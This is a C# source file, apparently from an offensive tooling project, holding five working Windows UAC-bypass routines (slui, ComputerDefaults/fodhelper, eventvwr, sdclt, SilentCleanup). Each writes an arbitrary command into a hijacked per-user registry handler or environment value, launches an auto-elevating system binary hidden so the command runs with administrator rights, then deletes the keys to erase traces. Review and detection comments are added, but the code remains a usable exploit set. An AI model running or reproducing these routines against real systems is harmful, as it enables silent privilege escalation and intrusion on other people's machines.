        /// <summary>
        /// Writes <paramref name="encodedCommand"/> as the default value of the per-user
        /// <c>HKCU\Software\Classes\exefile\Shell\Open\command</c> handler, starts
        /// <c>slui.exe</c> hidden with the <c>runas</c> verb, waits a fixed 10 seconds and then
        /// deletes the <c>exefile</c> key tree again. Technique credit is in the first comment.
        /// </summary>
        /// <param name="encodedCommand">The command line to store in the handler key, as UTF-8 bytes.</param>
        public Slui(byte[] encodedCommand)
        {
            //Credit: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation

            //Check if UAC is set to 'Always Notify'
            //NOTE(review): the instance is never read afterwards; presumably the AlwaysNotify
            //constructor performs the check itself - confirm in AlwaysNotify.
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string (UTF-8 only; bytes in any other encoding are mangled here)
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for the exefile handler this technique hijacks (see credit).
            //NOTE(review): OpenSubKey returns null when the key is missing or not writable, which
            //surfaces as a NullReferenceException on the next line; newkey is also never
            //closed/disposed (only sluikey is).
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"exefile\Shell\Open\command");

            RegistryKey sluikey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\exefile\Shell\Open\command", true);

            //Default (unnamed) value of the command key. '@command' is the plain identifier
            //'command' with the verbatim-identifier prefix, not a verbatim string literal.
            sluikey.SetValue("", @command);
            sluikey.Close();

            //start slui.exe hidden; "runas" asks the shell for an elevated launch
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\slui.exe";
            p.StartInfo.Verb        = "runas";
            p.Start();

            //sleep 10 seconds to let the payload execute (fixed delay; p is never waited on or disposed)
            Thread.Sleep(10000);

            //Unset the registry: the entire HKCU\Software\Classes\exefile tree is removed, including
            //anything a user had under it before this ran.
            //Detection note: a value-set on this key immediately followed by slui.exe starting is the
            //observable sequence; since the key is gone ~10 s later, registry value-set telemetry is
            //needed rather than an after-the-fact scan.
            newkey.DeleteSubKeyTree("exefile");
            return;
        }
        /// <summary>
        /// Creates the per-user <c>HKCU\Software\Classes\ms-settings\Shell\Open\command</c> key,
        /// sets an empty <c>DelegateExecute</c> value plus <paramref name="encodedCommand"/> as the
        /// default value, starts <c>ComputerDefaults.exe</c> hidden, waits a fixed 10 seconds and
        /// then deletes the <c>ms-settings</c> key tree again. Technique credit is in the first comment.
        /// </summary>
        /// <param name="encodedCommand">The command line to store in the handler key, as UTF-8 bytes.</param>
        public ComputerDefaults(byte[] encodedCommand)
        {
            //Credit: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

            //Check if UAC is set to 'Always Notify'
            //NOTE(review): the instance is never read afterwards; presumably the AlwaysNotify
            //constructor performs the check itself - confirm in AlwaysNotify.
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string (UTF-8 only)
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for the ms-settings handler (same key the credited fodhelper script uses).
            //NOTE(review): OpenSubKey returns null when the key is missing or not writable, which
            //surfaces as a NullReferenceException on the next line; newkey is never closed/disposed.
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"ms-settings\Shell\Open\command");

            RegistryKey fod = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\Shell\Open\command", true);

            //Empty DelegateExecute value first, then the default (unnamed) value holding the command.
            //'@command' is the plain identifier 'command', not a verbatim string.
            fod.SetValue("DelegateExecute", "");
            fod.SetValue("", @command);
            fod.Close();

            //start ComputerDefaults.exe hidden (no verb is set, unlike the slui variant)
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\ComputerDefaults.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute (fixed delay; p is never waited on or disposed)
            Thread.Sleep(10000);

            //Unset the registry: the whole HKCU\Software\Classes\ms-settings tree is removed.
            //Detection note: a DelegateExecute/default value-set on this key followed by
            //ComputerDefaults.exe starting is the observable sequence; the key is deleted ~10 s later.
            newkey.DeleteSubKeyTree("ms-settings");
            return;
        }
        /// <summary>
        /// Creates the per-user <c>HKCU\Software\Classes\mscfile\Shell\Open\command</c> key with
        /// <paramref name="encodedCommand"/> as its default value, starts <c>eventvwr.exe</c> hidden,
        /// waits a fixed 10 seconds and then deletes the <c>mscfile</c> key tree again.
        /// Technique credit is in the first comment.
        /// </summary>
        /// <param name="encodedCommand">The command line to store in the handler key, as UTF-8 bytes.</param>
        public EventVwr(byte[] encodedCommand)
        {
            //Credit: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

            //Check if UAC is set to 'Always Notify'
            //NOTE(review): the instance is never read afterwards; presumably the AlwaysNotify
            //constructor performs the check itself - confirm in AlwaysNotify.
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string (UTF-8 only)
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for the mscfile handler that eventvwr resolves (see credit).
            //NOTE(review): OpenSubKey returns null when the key is missing or not writable, which
            //surfaces as a NullReferenceException on the next line; newkey is never closed/disposed.
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"mscfile\Shell\Open\command");

            RegistryKey vwr = Registry.CurrentUser.OpenSubKey(@"Software\Classes\mscfile\Shell\Open\command", true);

            //Default (unnamed) value of the command key; '@command' is the plain identifier 'command'.
            vwr.SetValue("", @command);
            vwr.Close();

            //start eventvwr.exe hidden (no verb set)
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\eventvwr.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute (fixed delay; p is never waited on or disposed)
            Thread.Sleep(10000);

            //Unset the registry: the whole HKCU\Software\Classes\mscfile tree is removed.
            //Detection note: a value-set on this key followed by eventvwr.exe starting is the
            //observable sequence; the key is deleted ~10 s later, so rely on value-set telemetry.
            newkey.DeleteSubKeyTree("mscfile");
            return;
        }
        /// <summary>
        /// Exits the process unless <c>ProductName</c> under
        /// <c>HKLM\Software\Microsoft\Windows NT\CurrentVersion</c> contains "Windows 10"; otherwise
        /// creates the per-user <c>HKCU\Software\Classes\Folder\shell\open\command</c> key with
        /// <paramref name="encodedCommand"/> as its default value and an empty <c>DelegateExecute</c>,
        /// starts <c>sdclt.exe</c> hidden, waits a fixed 10 seconds and deletes the <c>Folder</c>
        /// key tree again. Technique credit is in the first comment.
        /// </summary>
        /// <param name="encodedCommand">The command line to store in the handler key, as UTF-8 bytes.</param>
        public Sdclt(byte[] encodedCommand)
        {
            // Credit: http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

            //Check if UAC is set to 'Always Notify'
            //NOTE(review): the instance is never read afterwards; presumably the AlwaysNotify
            //constructor performs the check itself - confirm in AlwaysNotify.
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //This only appears to work on Windows 10. Check the version of the OS
            //NOTE(review): a missing key or ProductName value would throw a NullReferenceException
            //here rather than reaching the explicit exit below.
            RegistryKey osversion      = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows NT\CurrentVersion\");
            string      windowsVersion = osversion.GetValue("ProductName").ToString();

            osversion.Close();
            //Ordinal, case-sensitive substring match. Environment.Exit terminates the whole
            //process from inside a constructor rather than throwing to the caller.
            if (!windowsVersion.Contains("Windows 10"))
            {
                System.Console.WriteLine("System is not Windows 10. This attack will fail. Exiting...");
                System.Environment.Exit(1);
            }

            //Convert encoded command to a string (UTF-8 only)
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Set the registry key for the Folder handler (see credit).
            //NOTE(review): OpenSubKey returns null when the key is missing or not writable, which
            //surfaces as a NullReferenceException on the next line; newkey is never closed/disposed.
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);

            newkey.CreateSubKey(@"Folder\shell\open\command");

            RegistryKey sdclt = Registry.CurrentUser.OpenSubKey(@"Software\Classes\Folder\shell\open\command", true);

            //Default (unnamed) value holding the command, then an empty DelegateExecute value
            //(the reverse order of the ComputerDefaults variant). '@command' is the identifier 'command'.
            sdclt.SetValue("", @command);
            sdclt.SetValue("DelegateExecute", "");
            sdclt.Close();

            //start sdclt.exe hidden (no verb set)
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\sdclt.exe";
            p.Start();

            //sleep 10 seconds to let the payload execute (fixed delay; p is never waited on or disposed)
            Thread.Sleep(10000);

            //Unset the registry: the whole HKCU\Software\Classes\Folder tree is removed.
            //Detection note: a value-set on this key followed by sdclt.exe starting is the
            //observable sequence; the key is deleted ~10 s later.
            newkey.DeleteSubKeyTree("Folder");
            return;
        }
        /// <summary>
        /// Exits the process unless the decoded <paramref name="encodedCommand"/> contains "REM";
        /// otherwise writes it as the per-user <c>windir</c> value under <c>HKCU\Environment</c>,
        /// runs the <c>\Microsoft\Windows\DiskCleanup\SilentCleanup</c> scheduled task via
        /// <c>schtasks.exe</c>, waits a fixed 10 seconds and then deletes the <c>windir</c> value.
        /// Technique credit is in the first comment.
        /// </summary>
        /// <param name="encodedCommand">The command line to store in the environment value, as UTF-8 bytes.</param>
        public DiskCleanup(byte[] encodedCommand)
        {
            //Credit: https://github.com/gushmazuko/WinBypass/blob/master/DiskCleanupBypass_direct.ps1

            //Check if UAC is set to 'Always Notify'
            //NOTE(review): the instance is never read afterwards; presumably the AlwaysNotify
            //constructor performs the check itself - confirm in AlwaysNotify.
            AlwaysNotify alwaysnotify = new AlwaysNotify();

            //Convert encoded command to a string (UTF-8 only)
            string command = Encoding.UTF8.GetString(encodedCommand);

            //Check that the command ends in "&& REM"
            //NOTE(review): the check is weaker than the comment says - it only requires the ordinal,
            //case-sensitive substring "REM" anywhere in the command, not a trailing "&& REM".
            //Environment.Exit terminates the whole process from inside a constructor.
            if (!command.Contains("REM"))
            {
                Console.WriteLine("Command must end in REM. Exiting...");
                System.Environment.Exit(1);
            }

            //Set the per-user windir environment value, which the SilentCleanup task presumably
            //expands when it runs (see credit). This is HKCU\Environment, not Software\Classes.
            //NOTE(review): OpenSubKey returns null when the key is not writable, which surfaces as a
            //NullReferenceException on the next line; newkey is never closed/disposed.
            RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Environment", true);

            //'@command' is the plain identifier 'command', not a verbatim string.
            newkey.SetValue("windir", @command);

            //start schtasks.exe hidden to run the SilentCleanup task immediately
            Process p = new Process();

            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.FileName    = "C:\\windows\\system32\\schtasks.exe";
            p.StartInfo.Arguments   = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I";
            p.Start();

            //sleep 10 seconds to let the payload execute (fixed delay; p is never waited on or disposed)
            Thread.Sleep(10000);

            //Unset the registry: the windir value is deleted outright, so any pre-existing user-scope
            //windir value is lost rather than restored.
            //Detection note: a user-scope "windir" environment value being set followed by schtasks
            //running SilentCleanup is the observable sequence; the value is removed ~10 s later.
            newkey.DeleteValue("windir");
            return;
        }